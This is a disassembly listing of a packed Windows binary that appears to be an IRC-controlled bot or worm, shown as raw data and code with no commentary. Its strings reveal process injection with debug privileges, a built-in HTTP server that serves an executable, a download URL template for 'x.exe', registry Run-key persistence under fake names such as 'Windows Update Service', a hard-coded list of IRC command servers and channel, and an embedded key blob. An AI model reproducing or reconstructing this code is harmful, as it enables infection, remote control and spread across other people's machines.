dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_315056D4 dd 401495h, 3, 40707Ch, 1, 0 dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31505768 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_315057D4 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_315011C0+372�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_31505848 dd 0 dd 40A89Ah, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 0
dd 40A89Ah, 1, 0
dd 1, 3 dup(0)
dd 586E6957h, 72502050h, 6Fh, 9 dup(0)
db 2 dup(0)
dword_31505906 dd 1004600h dw 1
dd 69570000h, 206B326Eh, 6F7250h, 0Ah dup(0)
dword_31505940 dd 7515123Ch, 2, 326E6957h, 5341206Bh, 0Ah dup(0)
; DATA XREF: sub_315011C0+41B�o
; sub_315011C0+45D�o
dd 123C0000h, 751Ch, 0Eh dup(0)
; ---------------------------------------------------------------------------
loc_315059B8: ; DATA XREF: sub_315011C0+44A�o
jmp short loc_315059C0
; ---------------------------------------------------------------------------
jmp short loc_315059C2
; ---------------------------------------------------------------------------
align 10h
loc_315059C0: ; CODE XREF: UPX0:loc_315059B8�j
; DATA XREF: sub_315011C0+5C�o
pop esp
pop esp
loc_315059C2: ; CODE XREF: UPX0:315059BA�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_315059CC dd 1CEC8166h dword_315059D0 dd 0E4FF07h aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_31501727+62�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_31501727+39�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_31501727+2A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_31501727+1B�o
align 4
aAdvapi32 db 'advapi32',0 ; DATA XREF: sub_31501727+8�o
; sub_31501D96+102�o
align 4
aUterm13_2i db 'uterm13.2i',0 ; DATA XREF: sub_315017AF:loc_31501894�o
; UPX0:31501D35�o ...
align 4
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_315017AF+58�o
align 4
aCreateremoteth db 'CreateRemoteThread',0 ; DATA XREF: sub_315017AF:loc_315017F6�o
align 4
aVirtualallocex db 'VirtualAllocEx',0 ; DATA XREF: sub_315017AF+34�o
align 4
aKernel32 db 'kernel32',0 ; DATA XREF: sub_315017AF+18�o
align 4
dword_31505A84 dd 0E9F3F5h aHttp1_1200Ok db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+106�o
db 0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aContentLengthU db 'Content-Length: %u',0Dh,0Ah ; DATA XREF: sub_31501A62+85�o
db 0Dh,0Ah,0
align 4
aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_31501A62+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
a_exe db '.exe',0 ; DATA XREF: sub_31501A62+55�o
; sub_315025F6+4B�o ...
align 10h
aGet db 'GET',0 ; DATA XREF: sub_31501A62+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:31501D20�o
align 10h
aUser32 db 'user32',0 ; DATA XREF: sub_31501D96+109�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_31501D96+FB�o
align 10h
aWininet db 'wininet',0 ; DATA XREF: sub_31501D96+F4�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_31501D96+E7�o
align 10h
aU14 db 'u14',0 ; DATA XREF: sub_31501D96+D5�o
aU13_2i db 'u13.2i',0 ; DATA XREF: sub_31501D96+C9�o
align 4
aU13i db 'u13i',0 ; DATA XREF: sub_31501D96+BD�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_31501D96+B1�o
aU12 db 'u12',0 ; DATA XREF: sub_31501D96+A5�o
aU11 db 'u11',0 ; DATA XREF: sub_31501D96+99�o
aU10 db 'u10',0 ; DATA XREF: sub_31501D96+8D�o
aU9 db 'u9',0 ; DATA XREF: sub_31501D96+81�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_31501D96+75�o
align 4
aU13ix db 'u13ix',0 ; DATA XREF: sub_31501D96+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31501D96+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_31501D96+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31501D96+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_31501D96+3B�o
align 4
aU13_2ix db 'u13.2ix',0 ; DATA XREF: sub_31501D96+22�o
asc_31505B8C db 0Dh,0Ah,0 ; DATA XREF: sub_31501F6B+124�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31501F6B+104�o
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31502277+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31501BA8+23�o
; sub_31502548+5F�o ...
align 4
aSystemUpdate db 'System Update',0 ; DATA XREF: sub_31501BA8+1C�o
; sub_315025F6+87�o ...
align 4
aDfashnzdsdl db 'dfashnzdsdl',0 ; DATA XREF: sub_315026C2+57�o
; sub_315026C2+8A�o
align 10h
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_315026C2+32�o
aClient db 'Client',0 ; DATA XREF: sub_315026C2+BC�o
; sub_315026C2+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_315026C2+37�o
; sub_315026C2+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31502548+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31502548+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31502548+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31502548+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31502548+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31502548+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31502548+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31502548+1D�o
align 10h
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31502548+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31502548+F�o
align 10h
asc_31505CF0: ; DATA XREF: sub_315025F6+56�o
; sub_31503608+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_315026C2+B7�o
unicode 0, <1>,0
dword_31505CF8 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_3150283F+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_31502826+3�o
align 4
off_31505E14 dd offset aMoscowAdvokat_ ; DATA XREF: UPX0:315034C8�r
; UPX0:3150351A�r
; "moscow-advokat.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset aDiemen_nl_eu_u ; "diemen.nl.eu.undernet.org"
dd offset aLulea_se_eu_un ; "lulea.se.eu.undernet.org"
dd offset aCoins_dal_net ; "coins.dal.net"
dd offset aBroadway_ny_us ; "broadway.ny.us.dal.net"
dd offset aOzbytes_dal_ne ; "ozbytes.dal.net"
dd offset aVancouver_dal_ ; "vancouver.dal.net"
dd offset aViking_dal_net ; "viking.dal.net"
dd offset aCed_dal_net ; "ced.dal.net"
dd offset aQis_md_us_dal_ ; "qis.md.us.dal.net"
aQis_md_us_dal_ db 'qis.md.us.dal.net',0 ; DATA XREF: UPX0:31505E5C�o
align 4
aCed_dal_net db 'ced.dal.net',0 ; DATA XREF: UPX0:31505E58�o
aViking_dal_net db 'viking.dal.net',0 ; DATA XREF: UPX0:31505E54�o
align 10h
aVancouver_dal_ db 'vancouver.dal.net',0 ; DATA XREF: UPX0:31505E50�o
align 4
aOzbytes_dal_ne db 'ozbytes.dal.net',0 ; DATA XREF: UPX0:31505E4C�o
aBroadway_ny_us db 'broadway.ny.us.dal.net',0 ; DATA XREF: UPX0:31505E48�o
align 4
aCoins_dal_net db 'coins.dal.net',0 ; DATA XREF: UPX0:31505E44�o
align 4
aLulea_se_eu_un db 'lulea.se.eu.undernet.org',0 ; DATA XREF: UPX0:31505E40�o
align 4
aDiemen_nl_eu_u db 'diemen.nl.eu.undernet.org',0 ; DATA XREF: UPX0:31505E3C�o
align 4
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31505E38�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31505E34�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31505E30�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31505E2C�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31505E28�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E24�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31505E20�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E1C�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31505E18�o
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31506000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_31505E14�o
; UPX1:31508401�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31502CB7+1C�o
align 10h
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31502CB7+C�o
align 4
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+1C4�o
align 10h
aAlready db 'already',0 ; DATA XREF: sub_31502DEC+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+D9�o
; sub_31502DEC+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+9C�o
align 10h
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_3150302E+4F�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_3150302E+C�o
; sub_315030B1:loc_31503153�o
align 4
a451 db '451',0 ; DATA XREF: sub_315030B1+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_315030B1+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_31503183+2C�o
align 10h
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_315032FA+3B�o
aTaty db '#taty',0 ; DATA XREF: UPX0:3150356A�o
align 4
a13 db '13',0 ; DATA XREF: UPX0:31503460�o
align 4
a_: ; DATA XREF: UPX0:31503455�o
unicode 0, <_>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31503608+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_31503722+2E8�o
align 4
aQ: ; DATA XREF: sub_31503722+2C3�o
unicode 0, <q>,0
aDD13SD db '%d,%d,13%s,%d',0 ; DATA XREF: sub_31503722+29D�o
align 10h
aI: ; DATA XREF: sub_31503722+253�o
unicode 0, <i>,0
asc_31506124: ; DATA XREF: sub_31503722+23A�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_31503722+146�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_31503722+78�o
align 4
dd 9 dup(0)
dword_31506158 dd 0 ; sub_31501BA8+80�w
dword_3150615C dd 0 ; sub_31501BA8+2D�w ...
dword_31506160 dd 0 ; sub_31501A62:loc_31501B10�r ...
dword_31506164 dd 68h ; UPX0:31501D40�w ...
dword_31506168 dd 0 ; sub_31501D96+33�w
dword_3150616C dd 8 dup(0) dword_3150618C dd 0 ; sub_31502277+20�r
dword_31506190 dd 31500000h ; UPX0:31501D25�w
dword_31506194 dd 0 ; sub_315021B0+53�o ...
dword_31506198 dd 0 ; UPX0:31502326�w ...
word_3150619C dw 0 ; DATA XREF: sub_315020C4+3B�r
; sub_31502128:loc_31502189�r ...
align 10h
dword_315061A0 dd 0 ; sub_315026C2+110�w ...
dword_315061A4 dd 0 ; UPX0:31503553�w ...
dword_315061A8 dd 0 ; sub_31503722+E8�r ...
dword_315061AC dd 8 dup(0) ; sub_31503722+A�o
dword_315061CC dd 38Dh dup(0) dd 0C4h, 40h, 74736C01h, 706D6372h, 47010041h, 6F4C7465h
dd 656C6163h, 6F666E49h, 53010041h, 75437465h, 6E657272h
dd 72694474h, 6F746365h, 417972h, 69725701h, 69466574h
dd 100656Ch, 53746547h, 65747379h, 6D69546Dh, 53010065h
dd 65747379h, 6D69546Dh, 466F5465h, 54656C69h, 656D69h
dd 72695601h, 6C617574h, 65657246h, 69560100h, 61757472h
dd 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 1004165h, 7274736Ch, 69706D63h, 47010041h
dd 79537465h, 6D657473h, 65726944h, 726F7463h, 1004179h
dd 7274736Ch, 41746163h, 6F430100h, 69467970h, 41656Ch
dd 6E695701h, 63657845h, 72430100h, 65746165h, 6C6F6F54h
dd 706C6568h, 6E533233h, 68737061h, 100746Fh, 636F7250h
dd 33737365h, 72694632h, 1007473h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 72500100h, 7365636Fh, 4E323373h
dd 747865h, 74736C01h, 79706372h, 43010041h, 74616572h
dd 65764565h, 41746Eh, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 65440100h, 6574656Ch, 656C6946h
dd 47010041h, 614C7465h, 72457473h, 726F72h, 69784501h
dd 6F725074h, 73736563h, 736C0100h, 656C7274h, 100416Eh
dd 65656C53h, 6C010070h, 63727473h, 416E7970h, 65470100h
dd 72754374h, 746E6572h, 636F7250h, 737365h, 74654701h
dd 636F7250h, 72646441h, 737365h, 616F4C01h, 62694C64h
dd 79726172h, 57010041h, 65746972h, 636F7250h, 4D737365h
dd 726F6D65h, 43010079h, 65736F6Ch, 646E6148h, 100656Ch
dd 6E65704Fh, 636F7250h, 737365h, 74654701h, 75646F4Dh
dd 6148656Ch, 656C646Eh, 47010041h, 69547465h, 6F436B63h
dd 746E75h, 65724301h, 4D657461h, 78657475h, 43010041h
dd 74616572h, 72685465h, 646165h, 65724301h, 50657461h
dd 65636F72h, 417373h, 74655301h, 6E657645h, 4F010074h
dd 456E6570h, 746E6576h, 45010041h, 54746978h, 61657268h
dd 49010064h, 7265746Eh, 6B636F6Ch, 6E496465h, 6D657263h
dd 746E65h, 61655201h, 6C694664h, 47010065h, 69467465h
dd 6953656Ch, 100657Ah, 61657243h, 69466574h, 41656Ch
dd 0D100h, 0
dd 72430100h, 43747079h, 74616572h, 73614865h, 43010068h
dd 74707972h, 68736148h, 61746144h, 72430100h, 56747079h
dd 66697265h, 67695379h, 7574616Eh, 416572h, 79724301h
dd 65447470h, 6F727473h, 73614879h, 43010068h, 74707972h
dd 74736544h, 4B796F72h, 1007965h, 70797243h, 6C655274h
dd 65736165h, 746E6F43h, 747865h, 79724301h, 63417470h
dd 72697571h, 6E6F4365h, 74786574h, 43010041h, 74707972h
dd 6F706D49h, 654B7472h, 52010079h, 72436765h, 65746165h
dd 4579654Bh, 1004178h, 53676552h, 61567465h, 4565756Ch
dd 1004178h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 65520100h, 65704F67h, 79654B6Eh, 417845h, 67655201h
dd 656C6544h, 61566574h, 4165756Ch, 65520100h, 6F6C4367h
dd 654B6573h, 41010079h, 74726F62h, 74737953h, 68536D65h
dd 6F647475h, 416E77h, 0DE00h, 0F800h, 74610100h, 100696Fh
dd 6E617461h, 69730100h, 6301006Eh, 100736Fh, 5F48455Fh
dd 6C6F7270h, 100676Fh, 78435F5Fh, 61724678h, 6148656Dh
dd 656C646Eh, 73010072h, 68637274h, 73010072h, 70637274h
dd 73010079h, 61637274h, 5F010074h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 72747301h, 727473h, 6E617201h, 73010064h
dd 646E6172h, 656D0100h, 7970636Dh, 74730100h, 6E656C72h
dd 656D0100h, 7465736Dh, 0E90000h, 13C0000h, 77010000h
dd 69727073h, 4166746Eh, 65470100h, 726F4674h, 6F726765h
dd 57646E75h, 6F646E69h, 46010077h, 57646E69h, 6F646E69h
dd 1004177h, 57746547h, 6F646E69h, 72685477h, 50646165h
dd 65636F72h, 64497373h, 0F40000h, 1500000h, 49010000h
dd 7265746Eh, 4F74656Eh, 556E6570h, 416C72h, 746E4901h
dd 656E7265h, 65704F74h, 100416Eh, 65746E49h, 74656E72h
dd 64616552h, 656C6946h, 6E490100h, 6E726574h, 65477465h
dd 6E6F4374h, 7463656Eh, 74536465h, 657461h, 10000h, 16400h
dd 12FF00h, 0FF0008FFh, 2FF0073h, 0DFF00h, 0FF0001FFh
dd 6FFF0039h, 0BFF00h, 0FF0034FFh, 0CFF0017h, 9FF00h, 0FF0004FFh
dd 10FF0013h, 16FF00h, 3FFh, 0
dd 4550h, 2014Ch, 40D3275Dh, 2 dup(0)
dd 10F00E0h, 6010Bh, 3400h, 1200h, 0
dd 1D18h, 1000h, 5000h, 31500000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3B68h, 8Ch, 14h dup(0)
dd 1000h, 1B0h, 6 dup(0)
dd 7865742Eh, 74h, 3330h, 1000h, 3400h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 11CDh, 5000h, 1200h, 3800h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3DA4h, 652Ch, 0C48BC800h, 0BC4B56DDh
dd 8BE18B0Ch, 0C371406Ah, 23231C47h, 5182363h, 9F080C14h
dd 4232323h, 8410FC00h, 7CF83A10h, 107C777Eh, 0E8B81078h
dd 6EFBE9BBh, 0B8E6B56h, 0D01D0CECh, 163B40B8h, 27EFBAE9h
dd 930520CCh, 1308E719h, 0CD180701h, 57850802h, 0F7C90B07h
dd 2F2B0096h, 0BE4A0030h, 4EE0E2E7h, 41601F57h, 57D93758h
dd 9ED0h, 443FFFBh, 746858EBh, 2F3A7074h, 3732312Fh, 0FF01302Eh
dd 31BFFD91h, 3030383Ah, 652E652Fh, 0DF6578h, 697A6F4Dh
dd 6D616C6Ch, 2FDBFFFFh, 5DDF2734h, 0B966C933h, 758D01F1h
dd 8AFE8B05h, 7993C06h, 0FF8ADF46h, 302C06BFh, 88993446h
dd 0EDE24707h, 0DAE80AEBh, 65622EFAh, 0FF6FFF67h, 93712EFBh
dd 1201C999h, 0FD91BDFDh, 72C10716h, 0FD42AA68h, 10FDAA66h
dd 0FBADD8BAh, 0A91C14F7h, 0F3C91A98h, 8608F198h, 10C57102h
dd 0FFD9FD87h, 37CB5F90h, 1C965992h, 0E4143A78h, 0A7D7157h
dd 0F6DF7D3Ah, 0F34571C9h, 8904F19Dh, 9C04F109h, 0CE91FEC7h
dd 67B44011h, 10F0E3F3h, 0B20BD11Ch, 0F7FB1B59h, 0C99B6076h
dd 14D90125h, 0CA17A204h, 0F9647F99h, 688D2B58h, 1AAE9161h
dd 1D966661h, 0DADEDB11h, 50B22867h, 149900C8h, 265557DCh
dd 0DBBDBF12h, 0C0A44E3Fh, 99491291h, 54F7EDh, 0CA3AC414h
dd 0FBBB0FCBh, 1C3C71D9h, 21E424FFh, 0CDCDCF1Ah, 0F72C668Fh
dd 8166D93Fh, 0B0FB133Fh, 0CDC383B8h, 64A85D12h, 0C96CDF3Bh
dd 0AE251DCBh, 93FD0C24h, 485AFEC9h, 14C096A6h, 0A7294C1Ch
dd 609CF3EBh, 0BA9767EFh, 0F43416EAh, 0DBF57126h, 0FFF77ECDh
dd 0EF133BF9h, 376B4629h, 4766DE5Fh, 0B7AAA8ECh, 8519F0ABh
dd 1FFFF90h, 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 0F6FFC999h
dd 0F55BBE5Fh, 0F2E9FCFCh, 0FCF7EBFCh, 0D9ABAAF5h, 0AAF934C7h
dd 9F25B459h, 2AFF97FDh, 0ACC9662Ah, 0B7819093h, 83639D90h
dd 9271CDC9h, 3519BF30h, 0C2FBB083h, 95DC1451h, 2A91720Ah
dd 0D2EEC871h, 0FFFFEDFFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh
dd 12B9C89Ah, 474A9A8Bh, 0AB9E5958h, 0A319DB9Bh, 6FFFFEDFh
dd 0A26CEC20h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 1FBDC812h
dd 0EB8D2E96h, 0FFE68584h, 9A85D812h, 99D125Ah, 0F8105A9Ah
dd 0B725D599h, 49FFDDB7h, 0FEFD7F66h, 5AA98712h, 850295C2h
dd 91048212h, 0A89BF35Ah, 0CFF7CB6Dh, 53FF855Dh, 8F72424Dh
dd 1874485Dh, 0FE85C853h, 2006206h, 0FFFFF1ADh, 4E204350h
dd 4F575445h, 50204B52h, 52474F52h, 31204D41h, 0FFFB17CDh
dd 414CF6B1h, 0A024D4Eh, 646E6957h, 2073776Fh, 20726F66h
dd 2DD60357h, 676B7F6Dh, 70756F72h, 611A330Eh, 5E234D27h
dd 32E96C3Eh, 32322158h, 4E312E32h, 6F92054h, 2018DA6Bh
dd 0A470323Ch, 50BB738Bh, 0A07192Bh, 5123FF0Ch, 7D8363h
dd 140A1104h, 0BBD40520h, 0CABB5BE8h, 4B4C0069h, 505353h
dd 0FB829756h, 8C91EDFh, 240057E0h, 64006Eh, 77006Fh, 0F6F63A73h
dd 30749B62h, 398C0901h, 3233500h, 1D44B6E6h, 0DA00072Eh
dd 644E7901h, 0DA2008ABh, 92649A87h, 26039F57h, 6D8360C8h
dd 47234601h, 73FF4007h, 60F23h, 1F011006h, 0E0888A15h
dd 0FF600048h, 4FE5FFh, 6A198144h, 49E4F27Ah, 30AF281Ch
dd 67107425h, 214FE153h, 0DF5C44DFh, 4003075h, 2DAE6BAFh
dd 5ABD075Ch, 8D615C08h, 4D75DC8Dh, 36072Eh, 30772E38h
dd 0DB7BAF61h, 0EC00491Bh, 3B240043h, 2D63003Fh, 64CF201Fh
dd 4DC08A2h, 0E41EC240h, 0FF16BFh, 0E00DEDEh, 19F1600h
dd 37EF2602h, 28404261h, 8B110319h, 0B868DECBh, 0D374D96Ch
dd 2A630070h, 0BE4296DBh, 9F256B9Ch, 75480E10h, 43D81DDh
dd 5413541Bh, 0FB9F265Ah, 5963D6DCh, 0CBC75C22h, 5876545h
dd 0F3483B55h, 10030B00h, 110B848h, 349FFFFBh, 286A0105h
dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 655FF52Eh, 5D1FF85Fh
dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 9F25D160h, 0F40CEC8Bh
dd 0CA060A3h, 790F200Ch, 0CB10CA0h, 4EFFBE00h, 880CA08Eh
dd 90040h, 703ECh, 49E11EC1h, 4F401495h, 0BF40707Ch, 0B2297B22h
dd 13430700h, 3FF09E79h, 138578h, 0E9A65BABh, 2FF81013h
dd 273C635h, 230EFEFFh, 30C1D240h, 84083658h, 0E4F24388h
dd 10B97DD3h, 0B801FFEEh, 0F2200C10h, 0AD793661h, 0F7F070Dh
dd 0E59F25D8h, 70011815h, 90060F84h, 0F84790Fh, 2000F95h
dd 0FC9E4D87h, 6C0F847Fh, 0C89A000Fh, 0A884AADEh, 0CA13436Fh
dd 1F8C093Fh, 50586E69h, 3C725020h, 0C0A6DBh, 39014446h
dd 0C93C6B32h, 123C844Fh, 41027515h, 7B220053h, 941C840Dh
dd 0AFFF9B01h, 0C606EB1Ch, 73255C5Ch, 6370695Ch, 9F816624h
dd 0ECFFF97Fh, 0E4FF071Ch, 44655300h, 67756265h, 6C697669h
dd 41656765h, 0B266DB64h, 73756AFFh, 6B6F5474h, 73176E65h
dd 75126F4Ch, 927F76FDh, 6C615670h, 17416575h, 6F28704Fh
dd 2FFE0C63h, 347324B6h, 76646143h, 33697061h, 12E2AEE3h
dd 6574757Fh, 13316D72h, 0BB036932h, 65A37F12h, 72545F15h
dd 39577961h, 0EF72431Bh, 65DBEDDCh, 65521E61h, 54056F6Dh
dd 56140C68h, 6E747269h, 75B6D6EDh, 5328415Ch, 520F7845h
dd 5F466E72h, 4B35D67Ah, 4822F3F5h, 83505454h, 89712FDEh
dd 5B322040h, 0D4B4F20h, 0DBFD010Ah, 6F4BFDADh, 2D02446Eh
dd 7467044Ch, 25203A68h, 2961ED75h, 282F189Bh, 0F4B97954h
dd 266B7DB6h, 696C70A7h, 15698563h, 0A32D782Fh, 0CB77EED8h
dd 6D6F632Dh, 65CD7270h, 5BDF5764h, 0D4FF28h, 544547h
dd 11640266h, 0DD2BFDA1h, 6D9573D7h, 0B1637673h, 6DA2DDD7h
dd 65017765h, 5F320F08h, 0FDCCDCE6h, 34317517h, 507F703h
dd 9A696E07h, 3132032Eh, 0D8133930h, 38B3937Bh, 2306781Fh
dd 0C9BDC07h, 4F303132h, 7F7F7529h, 0BB2098FBh, 52455355h
dd 4E084449h, 65849h, 48217B59h, 253AE8A1h, 0C5A7CD64h
dd 53FFF2F6h, 5754464Fh, 5C455241h, 736F694Dh, 0DD5CC36Fh
dd 0B783F0D6h, 7275435Ch, 0C8560972h, 0B55CFE73h, 52C3E142h
dd 7953BC75h, 0F25290FDh, 0E7A1877Fh, 6664579Ah, 6E687361h
dd 6473647Ah, 76D6126Ch, 77495313h, 5C573F61h, 0ED860A1h
dd 528B396Ch, 0B44B0D57h, 39C23D6h, 667120F5h, 0F70E86EFh
dd 76206769h, 38761BFDh, 9D326576h, 67B9B64Bh, 10532064h
dd 0B81B6544h, 1421B237h, 1B17235Ch, 9B325C3Fh, 42004CABh
dd 0AC91203Fh, 3D9F1A35h, 0B01EBF23h, 654AD42h, 69443792h
dd 6DBB9E73h, 66EE7694h, 9C6D672Fh, 6C2FF62Ah, 632463C9h
